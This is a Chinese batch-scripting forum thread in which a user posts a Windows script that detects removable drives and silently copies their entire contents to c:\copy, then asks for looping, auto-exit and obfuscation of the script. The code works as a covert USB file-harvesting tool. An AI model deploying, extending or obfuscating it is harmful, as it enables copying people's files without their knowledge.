[新手上路]批处理新手入门导读[视频教程]批处理基础视频教程[视频教程]VBS基础视频教程[批处理精品]批处理版照片整理器
[批处理精品]纯批处理备份&还原驱动[批处理精品]CMD命令50条不能说的秘密[在线下载]第三方命令行工具[在线帮助]VBScript / JScript 在线参考
返回列表 发帖

[文本处理] 求批处理移动设备复制全代码?

将代码:
  1. @echo off
  2. cls
  3. del /Q /f "%temp%\copy.tmp" >nul 2>nul
  4. for %%i in (c,d,e,f,g,h,i,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z) do @fsutil fsinfo drivetype %%i: >>"%temp%\copy.tmp"
  5. findstr /i "可移动驱动器" "%temp%\copy.tmp"  
  6. if errorlevel==1 goto end
  7. if errorlevel==0 goto copy  
  8. :end  
  9. rem 没有检测到可移动磁盘!
  10. if not exist %temp%\sleep.exe ping 127.0.0.1 -n 20 >nul 2>nul
  11. %temp%\sleep.exe 20s
  12. goto again
  13. :copy  
  14. if exist c:\copy goto goon
  15. cd\
  16. cd /d c:
  17. md copy   
  18. :goon  
  19. for /f "tokens=1" %%i in ('findstr /i "可移动驱动器" "%temp%\copy.tmp"') do (
  20. xcopy /e /y  %%i\*.* c:\copy >nul 2>nul
  21. )
  22. rem 已复制,请及时清理文件!
  23. if not exist %temp%\sleep.exe ping 127.0.0.1 -n 20 >nul 2>nul
  24. %temp%\sleep.exe 20s
  25. goto again
复制代码



加入几个功能:

1  当没有检测到移动存储设备时60S后重新检测.

2  当复制完成后关闭该脚本

3  最好加密该脚本,但不影响其运行.


小弟在此先谢谢了```请高手直接给码

为什么没有人帮我看看```没码至少给多少给我指点下啊```大家都这么冷漠

TOP

返回列表